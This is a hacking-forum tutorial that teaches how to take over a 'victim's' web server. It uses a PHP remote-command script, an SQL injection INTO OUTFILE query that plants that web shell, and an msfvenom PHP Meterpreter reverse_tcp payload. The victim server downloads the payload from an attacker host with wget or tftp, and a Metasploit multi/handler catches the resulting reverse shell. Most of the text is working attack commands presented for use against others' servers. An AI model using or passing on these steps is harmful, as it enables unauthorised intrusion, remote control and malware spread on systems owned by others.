Hey guys,

I've seen some people around not caring much about Remote Code Execution so I decided to show them how this vulnerability can be used to setup a Meterpreter Shell on the Victim's Server and how to Control It Completely.
I won't be teaching anyone how to use Meterpreter; this is the Website and Forum Hacking section; this tutorial will only be about setting up a Meterpreter shell on the Victim's box and Setting up a Connection to it.

What is involved in this Tutorial:

1- What is RCE
2- How to use RCE
3- How to create your own RCE vulnerable script using Sql Injection
4- Simple commands to use in a RCE
5- Creating a simple PHP Meterpreter Shell using Metasploit Tools
6- Uploading that Shell on the Server using RCE using specific commands.
7- I will also teach you how to Upload the Shell on the Server even if it WASN'T Linux (because everyone here will tell you to use wget which doesn't work on Windows so I'll teach you how to use another function)
8- How to connect to our Meterpreter Shell using Metasploit and that's it (I won't teach you how to use Meterpreter Shell)

What is Meterpreter Capable Of:

This is just a simple paragraph that should push the people, who doesn't know what Meterpreter shells are and what they're capable of, to go ahead and learn that already...

1- Upload Files
2- Copy Files
3- Run/Open Files
4- Download Malware
5- Destroy the server(lol)
6- Spread a worm
7- Read Files
8- Upload Files
etc...

What is RCE(Remote Code Execution):

PHP Code:
<?php
echo "Remote Code Execution<br>";
$command=$_GET['command'];
system($command);
?>
This is a vulnerable script in PHP. As you can see, the problem is in system($command).
This will execute a function related to the system.
Lets pretend that this scripts is uploaded on this link http://victimswebsite.com/rce.php
To inject this you simple have to do the following:
Code:
http://victimswebsite.com/rce.php?command=net user
And this command will return, on the webpage, the output of this command.

How to create a RCE script using Sql Injection:

Now what if our Victim owns a website in which we couldn't find a RCE vulnerability but we were capable of finding a Sql Injection vulnerability?
Well, with Sql Injection we can always upload the RCE Script I shared with you in the beginning of this thread using INTO OUTFILE function.
Now this function demands Privileges so it might not always work.

Also, I wont be teaching you how to use Sql Injection or how to use INTO OUTFILE... This isn't what this tutorial is about but I will be showing you the final stage of your query before you use it to UPLOAD a RCE vulnerable script on your victim's server:
Code:
http://victimswebsite.com/index.php?i=1 union select 1,2,3,"<?php $command=$_GET['command'];system($command); ?>",4,5,6 INTO OUTFILE "/var/website/whatever/rce.php"
If you don't know what this means then check this Tutorial Out: http://www.exploit-db.com/papers/14635/

Anyways, now we can access that file using:
Code:
http://victimswebsite.com/rce.php?command=yourcommand
How to create your PHP Meterpreter Shell:

So now we got our RCE Vulnerable Script ready for action.
Lets create our Reverse PHP Meterpreter Shell using msfvenom.

1- lets see all of the payloads available:
Code:
msfvenom --list payloads
2- We need a Reverse Meterpreter Shell and We need to Extract it and save it as a .php file
Code:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.10 -f raw > /root/Desktop/thefile.php
Image:

LHOST should be equals to your IP Address. (you can use DynDNS so whatever)
Now our shell is saved on our desktop as thefile.php

3- We have to edit thefile.php because as default the beginning of the file is #<?php so we have to remove the # to make this work as a normal php script, so, remove the # and save the file.

Uploading the Shell:

1- Firstly, you have to upload your shell somewhere.
You can create your own host at http://000webhost.com/ (or any others) and upload the shell.
Lets pretend our shell is now uploaded to:
Code:
http://mywebsite.com/thescript.php
2- Now we have to get this shell on our Victim's server so we need to our RCE script.
For Linux:
Code:
http://victimswebsite.com/rce.php?command=wget http://mywebsite.com/thescript.php
or
Code:
http://victimswebsite.com/rce.php?command=wget http://IPADDRESS:80/thescript.php
For Windows:(we will use tftp, since the server should be having tftp available)
Why not FTP? FTP with CMD is Considered an Interactive Program and we can't work with Interactive Programs threw RCE.
Code:
http://victimswebsite.com/rce.php?command=tftp -i yourwebsiteip GET thescript.php
And now we have an uploaded Meterpreter Shell to:
Code:
http://victimswebsite.com/thescript.php
DO NOT OPEN THAT LINK YET.

Listening to Incoming Connections:

1- First we have to open Metasploit:
Code:
msfconsole
2- Now we have to use an "exploit" related to listening to incoming connection from specific payloads
Code:
use exploit/multi/handler
3- Now we have to set the Payload
Code:
set PAYLOAD php/meterpreter/reverse_tcp
4- Now we have to set our LHOST
Code:
set LHOST youripaddress
Image:

5- Run the exploit
Code:
exploit
So now we got Metasploit listening to any incoming connections.

Connecting to Our Shell:

Now we just have to open our shell threw the victim's website:
Code:
http://victimswebsite.com/thescript.php
And we can go back to Metasploit and we will see that it catches a new Connection and opens our Meterpreter.
And now we can execute any command onto that server using Meterpreter.
And here's a simple Link related to a huge and great explanation about Meterpreter and What you're capable of doing while using it: http://www.offensive-security.com/me...rpreter_Basics

That's all for now,
Some of the credits (when it comes to Metasploit) goes for http://securitytube.net/
Thanks for reading,
dotcppfile.